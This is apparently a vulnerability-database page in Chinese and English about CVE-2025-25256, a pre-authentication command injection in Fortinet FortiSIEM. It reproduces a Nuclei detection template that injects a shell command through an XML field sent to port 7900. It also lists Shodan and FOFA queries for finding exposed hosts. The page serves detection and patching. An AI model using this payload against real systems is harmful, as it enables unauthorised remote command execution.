CVE-2025-25256: Fortinet FortiSIEM - OS Command Injection

日期: 2025-08-01 | 影响软件: Fortinet FortiSIEM | POC: 已公开

漏洞描述

Fortinet FortiSIEM 6.7.9 < version <= 7.3.1 contains an OS command injection caused by improper neutralization of special elements in CLI requests, letting unauthenticated attackers execute unauthorized commands remotely.

PoC代码[已公开]

id: CVE-2025-25256

info:
  name: Fortinet FortiSIEM - OS Command Injection
  severity: critical
  author: watchtowr,darses
  description: |
    Fortinet FortiSIEM 6.7.9 < version <= 7.3.1 contains an OS command injection caused by improper neutralization of special elements in CLI requests, letting unauthenticated attackers execute unauthorized commands remotely.
  impact: |
    Unauthenticated attackers can execute arbitrary commands, potentially leading to full system compromise.
  remediation: |
    Update to the latest version beyond 7.3.1.
  classification:
    cve-id: CVE-2025-25256
    cwe-id: CWE-78
    cvss-metrics: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
    cvss-score: 9.8
    epss-percentile: 0.96596
    epss-score: 0.30941
    cpe: cpe:2.3:a:fortinet:fortisiem:*:*:*:*:*:*:*:*
  metadata:
    vendor: fortinet
    product: fortisiem
    shodan-query:
      - http.favicon.hash:-1341442175
      - http.html:"var hst = location.hostname"
    fofa-query:
      - icon_hash="-1341442175"
      - body="var hst = location.hostname"
  reference:
    - https://www.fortiguard.com/psirt/FG-IR-25-152
    - https://github.com/watchtowrlabs/watchTowr-vs-FortiSIEM-CVE-2025-25256
    - https://labs.watchtowr.com/should-security-solutions-be-secure-maybe-were-all-wrong-fortinet-fortisiem-pre-auth-command-injection-cve-2025-25256/
  tags: cve,cve2025,rce,network,tcp,fortinet,vkev

variables:
  xml: |
    <root>
      <archive_storage_type>nfs</archive_storage_type>
      <archive_nfs_server_ip>127.0.0.1</archive_nfs_server_ip>
      <archive_nfs_archive_dir>`echo${IFS}/`</archive_nfs_archive_dir>
      <scope>local</scope>
    </root>
  payload: "\x5a\x00\x00\x00{{hex_decode(dec_to_hex(len(xml)))}}\x00\x00\x00\x6f\x42\x1e\x40\x00\x00\x00\x00{{xml}}"

tcp:
  - inputs:
      - data: "{{payload}}"

    host:
      - "tls://{{Hostname}}"
    port: 7900
    read-size: 1024

    matchers:
      - type: word
        part: raw
        words:
          - "\x01\x00\x00\x00"
# digest: 4a0a004730450220163d3c9ac9fe3eabbcca933d8a8b98b2ed6ec1270f0c7c1547d8c468ce3bc9da022100bcf0eca67bcee65916fe48405e7e88a2516999fbf3662b09b02ef37ce2ed191e:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/network/cves/2025/CVE-2025-25256.yaml

相关漏洞推荐